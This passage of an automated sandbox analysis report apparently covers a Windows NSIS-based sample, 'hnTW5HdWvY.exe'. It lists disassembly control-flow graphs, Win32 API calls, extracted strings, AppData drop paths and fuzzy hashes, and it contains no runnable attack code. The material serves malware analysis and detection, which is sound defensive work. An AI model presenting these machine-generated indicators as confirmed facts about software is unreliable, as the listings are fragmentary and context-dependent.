                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                          • String ID:
                                                                          • API String ID: 310444273-0
                                                                          • Opcode ID: 6a16e0dd3cc6108475a6e7adf37e54332756fcc3f7317002038e5d5bd84af621
                                                                          • Instruction ID: 6203a20b8c6d2c7dd9bc8fde92c4464bacb2d6670710d6b04c7398c309678aab
                                                                          • Opcode Fuzzy Hash: 6a16e0dd3cc6108475a6e7adf37e54332756fcc3f7317002038e5d5bd84af621
                                                                          • Instruction Fuzzy Hash: 25E0C232A04611ABC710AB34DC08A6B77B8EF88651304893EF555F6151D734EC11ABFA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 00402656
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: FileFindFirst
                                                                          • String ID:
                                                                          • API String ID: 1974802433-0
                                                                          • Opcode ID: 324f6059646226e638cebd62381d6f71d9e34c43330c4a77c7f3c5d649a2b334
                                                                          • Instruction ID: 9954a9e90a4ff8e1476aca16375cd89b929f17a4c0bf373ce54cb0035b2a7fc8
                                                                          • Opcode Fuzzy Hash: 324f6059646226e638cebd62381d6f71d9e34c43330c4a77c7f3c5d649a2b334
                                                                          • Instruction Fuzzy Hash: 4AF0A0725041509AD700E7A49D49AFEB368DB12324F2046BBE101B20C1D2B85942AB2E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 227 403995-4039a7 228 403ae8-403af7 227->228 229 4039ad-4039b3 227->229 231 403b46-403b5b 228->231 232 403af9-403b41 GetDlgItem * 2 call 403e68 SetClassLongA call 40140b 228->232 229->228 230 4039b9-4039c2 229->230 233 4039c4-4039d1 SetWindowPos 230->233 234 4039d7-4039da 230->234 236 403b9b-403ba0 call 403eb4 231->236 237 403b5d-403b60 231->237 232->231 233->234 241 4039f4-4039fa 234->241 242 4039dc-4039ee ShowWindow 234->242 246 403ba5-403bc0 236->246 238 403b62-403b6d call 401389 237->238 239 403b93-403b95 237->239 238->239 260 403b6f-403b8e SendMessageA 238->260 239->236 245 403e35 239->245 247 403a16-403a19 241->247 248 4039fc-403a11 DestroyWindow 241->248 242->241 253 403e37-403e3e 245->253 251 403bc2-403bc4 call 40140b 246->251 252 403bc9-403bcf 246->252 256 403a1b-403a27 SetWindowLongA 247->256 257 403a2c-403a32 247->257 254 403e12-403e18 248->254 251->252 263 403df3-403e0c DestroyWindow EndDialog 252->263 264 403bd5-403be0 252->264 254->245 261 403e1a-403e20 254->261 256->253 258 403ad5-403ae3 call 403ecf 257->258 259 403a38-403a49 GetDlgItem 257->259 258->253 265 403a68-403a6b 259->265 266 403a4b-403a62 SendMessageA IsWindowEnabled 259->266 260->253 261->245 268 403e22-403e2b ShowWindow 261->268 263->254 264->263 269 403be6-403c33 call 405b9c call 403e68 * 3 GetDlgItem 264->269 270 403a70-403a73 265->270 271 403a6d-403a6e 265->271 266->245 266->265 268->245 297 403c35-403c3a 269->297 298 403c3d-403c79 ShowWindow KiUserCallbackDispatcher call 403e8a EnableWindow 269->298 275 403a81-403a86 270->275 276 403a75-403a7b 270->276 274 403a9e-403aa3 call 403e41 271->274 274->258 278 403abc-403acf SendMessageA 275->278 280 403a88-403a8e 275->280 276->278 279 403a7d-403a7f 276->279 278->258 279->274 284 403a90-403a96 call 40140b 280->284 285 403aa5-403aae call 40140b 280->285 295 403a9c 284->295 285->258 294 403ab0-403aba 285->294 294->295 295->274 297->298 301 403c7b-403c7c 298->301 302 403c7e 298->302 303 403c80-403cae GetSystemMenu EnableMenuItem SendMessageA 301->303 302->303 304 403cb0-403cc1 SendMessageA 303->304 305 403cc3 303->305 306 403cc9-403d02 call 403e9d call 405b7a lstrlenA call 405b9c SetWindowTextA call 401389 304->306 305->306 306->246 315 403d08-403d0a 306->315 315->246 316 403d10-403d14 315->316 317 403d33-403d47 DestroyWindow 316->317 318 403d16-403d1c 316->318 317->254 320 403d4d-403d7a CreateDialogParamA 317->320 318->245 319 403d22-403d28 318->319 319->246 321 403d2e 319->321 320->254 322 403d80-403dd7 call 403e68 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 320->322 321->245 322->245 327 403dd9-403dec ShowWindow call 403eb4 322->327 329 403df1 327->329 329->254
                                                                          APIs
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039D1
                                                                          • ShowWindow.USER32(?), ref: 004039EE
                                                                          • DestroyWindow.USER32 ref: 00403A02
                                                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A1E
                                                                          • GetDlgItem.USER32(?,?), ref: 00403A3F
                                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A53
                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403A5A
                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403B08
                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403B12
                                                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403B2C
                                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B7D
                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403C23
                                                                          • ShowWindow.USER32(00000000,?), ref: 00403C44
                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403C56
                                                                          • EnableWindow.USER32(?,?), ref: 00403C71
                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C87
                                                                          • EnableMenuItem.USER32(00000000), ref: 00403C8E
                                                                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CA6
                                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CB9
                                                                          • lstrlenA.KERNEL32(0079E4F8,?,0079E4F8,Profiling Setup), ref: 00403CE2
                                                                          • SetWindowTextA.USER32(?,0079E4F8), ref: 00403CF1
                                                                          • ShowWindow.USER32(?,0000000A), ref: 00403E25
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                          • String ID: Profiling Setup
                                                                          • API String ID: 3282139019-34039551
                                                                          • Opcode ID: e551cda9a3bf437e544b283e473c0f8b7dcf03e8c3845f4d2f125511825ec522
                                                                          • Instruction ID: 9d8e585b2be547e11c17cdc3c7f689375e8eb6d0c46788926a5446a1ddc0af4a
                                                                          • Opcode Fuzzy Hash: e551cda9a3bf437e544b283e473c0f8b7dcf03e8c3845f4d2f125511825ec522
                                                                          • Instruction Fuzzy Hash: E4C1AF71904200ABEB216F61ED49E2B3EBCEB46746F04453EF641B11F1C73DA9429B6E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 381 403603-40361b call 405ea5 384 40361d-40362d call 405ad8 381->384 385 40362f-403660 call 405a61 381->385 394 403683-4036ac call 4038c8 call 4056f8 384->394 390 403662-403673 call 405a61 385->390 391 403678-40367e lstrcatA 385->391 390->391 391->394 399 4036b2-4036b7 394->399 400 403733-40373b call 4056f8 394->400 399->400 401 4036b9-4036dd call 405a61 399->401 406 403749-40376e LoadImageA 400->406 407 40373d-403744 call 405b9c 400->407 401->400 408 4036df-4036e1 401->408 410 403770-4037a0 RegisterClassA 406->410 411 4037ef-4037f7 call 40140b 406->411 407->406 412 4036f2-4036fe lstrlenA 408->412 413 4036e3-4036f0 call 405635 408->413 414 4037a6-4037ea SystemParametersInfoA CreateWindowExA 410->414 415 4038be 410->415 425 403801-40380c call 4038c8 411->425 426 4037f9-4037fc 411->426 419 403700-40370e lstrcmpiA 412->419 420 403726-40372e call 40560a call 405b7a 412->420 413->412 414->411 417 4038c0-4038c7 415->417 419->420 424 403710-40371a GetFileAttributesA 419->424 420->400 429 403720-403721 call 405651 424->429 430 40371c-40371e 424->430 434 403812-40382f ShowWindow LoadLibraryA 425->434 435 403895-403896 call 404f37 425->435 426->417 429->420 430->420 430->429 436 403831-403836 LoadLibraryA 434->436 437 403838-40384a GetClassInfoA 434->437 441 40389b-40389d 435->441 436->437 439 403862-403885 DialogBoxParamA call 40140b 437->439 440 40384c-40385c GetClassInfoA RegisterClassA 437->440 447 40388a-403893 call 403553 439->447 440->439 443 4038b7-4038b9 call 40140b 441->443 444 40389f-4038a5 441->444 443->415 444->426 445 4038ab-4038b2 call 40140b 444->445 445->426 447->417
                                                                          APIs
                                                                            • Part of subcall function 00405EA5: GetModuleHandleA.KERNEL32(?,?,?,00403110,00000008), ref: 00405EB7
                                                                            • Part of subcall function 00405EA5: LoadLibraryA.KERNELBASE(?,?,?,00403110,00000008), ref: 00405EC2
                                                                            • Part of subcall function 00405EA5: GetProcAddress.KERNEL32(00000000,?), ref: 00405ED3
                                                                          • lstrcatA.KERNEL32(1033,0079E4F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E4F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\,74DF3410,"C:\Users\user\Desktop\hnTW5HdWvY.exe",00000000), ref: 0040367E
                                                                          • lstrlenA.KERNEL32(Exec,?,?,?,Exec,00000000,C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited,1033,0079E4F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E4F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004036F3
                                                                          • lstrcmpiA.KERNEL32(?,.exe), ref: 00403706
                                                                          • GetFileAttributesA.KERNEL32(Exec), ref: 00403711
                                                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited), ref: 0040375A
                                                                            • Part of subcall function 00405AD8: wsprintfA.USER32 ref: 00405AE5
                                                                          • RegisterClassA.USER32(007A16A0), ref: 00403797
                                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004037AF
                                                                          • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004037E4
                                                                          • ShowWindow.USER32(00000005,00000000), ref: 0040381A
                                                                          • LoadLibraryA.KERNELBASE(RichEd20), ref: 0040382B
                                                                          • LoadLibraryA.KERNEL32(RichEd32), ref: 00403836
                                                                          • GetClassInfoA.USER32(00000000,RichEdit20A,007A16A0), ref: 00403846
                                                                          • GetClassInfoA.USER32(00000000,RichEdit,007A16A0), ref: 00403853
                                                                          • RegisterClassA.USER32(007A16A0), ref: 0040385C
                                                                          • DialogBoxParamA.USER32(?,00000000,00403995,00000000), ref: 0040387B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                          • String ID: "C:\Users\user\Desktop\hnTW5HdWvY.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited$Control Panel\Desktop\ResourceLocale$Exec$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                          • API String ID: 914957316-3415841326
                                                                          • Opcode ID: 466d8c25be6032520fae9a6c57d10c68e4166b79624d35f700c5268366167497
                                                                          • Instruction ID: 4586539b311a540a7331b1428def64a498e1fe17218f43e7d0271d3a33dfe7cf
                                                                          • Opcode Fuzzy Hash: 466d8c25be6032520fae9a6c57d10c68e4166b79624d35f700c5268366167497
                                                                          • Instruction Fuzzy Hash: 6561F5B49442407EE320AF619C85F2B3EACE786746F44857EF545B22E1CB7D69018A2E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 452 402c2b-402c79 GetTickCount GetModuleFileNameA call 40580b 455 402c85-402cb3 call 405b7a call 405651 call 405b7a GetFileSize 452->455 456 402c7b-402c80 452->456 464 402da0-402dae call 402bc7 455->464 465 402cb9 455->465 457 402e5d-402e61 456->457 471 402db0-402db3 464->471 472 402e03-402e08 464->472 467 402cbe-402cd5 465->467 469 402cd7 467->469 470 402cd9-402ce2 call 40306a 467->470 469->470 477 402ce8-402cef 470->477 478 402e0a-402e12 call 402bc7 470->478 474 402db5-402dcd call 403080 call 40306a 471->474 475 402dd7-402e01 GlobalAlloc call 403080 call 402e64 471->475 472->457 474->472 499 402dcf-402dd5 474->499 475->472 503 402e14-402e25 475->503 481 402cf1-402d05 call 4057c6 477->481 482 402d6b-402d6f 477->482 478->472 490 402d79-402d7f 481->490 501 402d07-402d0e 481->501 489 402d71-402d78 call 402bc7 482->489 482->490 489->490 492 402d81-402d8b call 405f17 490->492 493 402d8e-402d98 490->493 492->493 493->467 502 402d9e 493->502 499->472 499->475 501->490 505 402d10-402d17 501->505 502->464 506 402e27 503->506 507 402e2d-402e32 503->507 505->490 508 402d19-402d20 505->508 506->507 509 402e33-402e39 507->509 508->490 510 402d22-402d29 508->510 509->509 511 402e3b-402e56 SetFilePointer call 4057c6 509->511 510->490 512 402d2b-402d4b 510->512 514 402e5b 511->514 512->472 515 402d51-402d55 512->515 514->457 516 402d57-402d5b 515->516 517 402d5d-402d65 515->517 516->502 516->517 517->490 518 402d67-402d69 517->518 518->490
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00402C3C
                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\hnTW5HdWvY.exe,00000400), ref: 00402C58
                                                                            • Part of subcall function 0040580B: GetFileAttributesA.KERNELBASE(00000003,00402C6B,C:\Users\user\Desktop\hnTW5HdWvY.exe,80000000,00000003), ref: 0040580F
                                                                            • Part of subcall function 0040580B: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405831
                                                                          • GetFileSize.KERNEL32(00000000,00000000,007A9000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\hnTW5HdWvY.exe,C:\Users\user\Desktop\hnTW5HdWvY.exe,80000000,00000003), ref: 00402CA4
                                                                          Strings
                                                                          • Inst, xrefs: 00402D10
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C35
                                                                          • "C:\Users\user\Desktop\hnTW5HdWvY.exe", xrefs: 00402C2B
                                                                          • Error launching installer, xrefs: 00402C7B
                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E03
                                                                          • C:\Users\user\Desktop, xrefs: 00402C86, 00402C8B, 00402C91
                                                                          • Null, xrefs: 00402D22
                                                                          • soft, xrefs: 00402D19
                                                                          • C:\Users\user\Desktop\hnTW5HdWvY.exe, xrefs: 00402C42, 00402C51, 00402C65, 00402C85
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                          • String ID: "C:\Users\user\Desktop\hnTW5HdWvY.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\hnTW5HdWvY.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                          • API String ID: 4283519449-2507468497
                                                                          • Opcode ID: fd7a13382d7d0fbd8bf23db57088f8f546a6f222ad9c5de8cc178bffd293609c
                                                                          • Instruction ID: f4f743896e3c3c29250869f87ba77b7665a96188decf60a66d8326f59fe02ce9
                                                                          • Opcode Fuzzy Hash: fd7a13382d7d0fbd8bf23db57088f8f546a6f222ad9c5de8cc178bffd293609c
                                                                          • Instruction Fuzzy Hash: 3C51D271941204AFDB109F65DE89B9E7BA8EF41354F10413BFA00B62D1D7BC9D818BAD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 650 40173f-401762 call 4029ff call 405677 655 401764-40176a call 405b7a 650->655 656 40176c-40177e call 405b7a call 40560a lstrcatA 650->656 661 401783-401789 call 405de5 655->661 656->661 666 40178e-401792 661->666 667 401794-40179e call 405e7e 666->667 668 4017c5-4017c8 666->668 676 4017b0-4017c2 667->676 677 4017a0-4017ae CompareFileTime 667->677 669 4017d0-4017ec call 40580b 668->669 670 4017ca-4017cb call 4057e6 668->670 678 401864-40188d call 404e65 call 402e64 669->678 679 4017ee-4017f1 669->679 670->669 676->668 677->676 693 401895-4018a1 SetFileTime 678->693 694 40188f-401893 678->694 680 4017f3-401835 call 405b7a * 2 call 405b9c call 405b7a call 40538e 679->680 681 401846-401850 call 404e65 679->681 680->666 713 40183b-40183c 680->713 691 401859-40185f 681->691 696 40289d 691->696 695 4018a7-4018b2 CloseHandle 693->695 694->693 694->695 698 402894-402897 695->698 699 4018b8-4018bb 695->699 701 40289f-4028a3 696->701 698->696 702 4018d0-4018d3 call 405b9c 699->702 703 4018bd-4018ce call 405b9c lstrcatA 699->703 709 4018d8-40222d call 40538e 702->709 703->709 709->701 713->691 716 40183e-40183f 713->716 716->681
                                                                          APIs
                                                                          • lstrcatA.KERNEL32(00000000,00000000,Exec,C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs,00000000,00000000,00000031), ref: 0040177E
                                                                          • CompareFileTime.KERNEL32(-00000014,?,Exec,Exec,00000000,00000000,Exec,C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs,00000000,00000000,00000031), ref: 004017A8
                                                                            • Part of subcall function 00405B7A: lstrcpynA.KERNEL32(?,?,00000400,0040313B,Profiling Setup,NSIS Error), ref: 00405B87
                                                                            • Part of subcall function 00404E65: lstrlenA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,0078EAA8,007890A8,?,?,?,?,?,?,?,?,?,00402F9E,00000000,?), ref: 00404E9E
                                                                            • Part of subcall function 00404E65: lstrlenA.KERNEL32(00402F9E,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,0078EAA8,007890A8,?,?,?,?,?,?,?,?,?,00402F9E,00000000), ref: 00404EAE
                                                                            • Part of subcall function 00404E65: lstrcatA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00402F9E,00402F9E,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,0078EAA8,007890A8), ref: 00404EC1
                                                                            • Part of subcall function 00404E65: SetWindowTextA.USER32(Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll), ref: 00404ED3
                                                                            • Part of subcall function 00404E65: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EF9
                                                                            • Part of subcall function 00404E65: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F13
                                                                            • Part of subcall function 00404E65: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F21
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
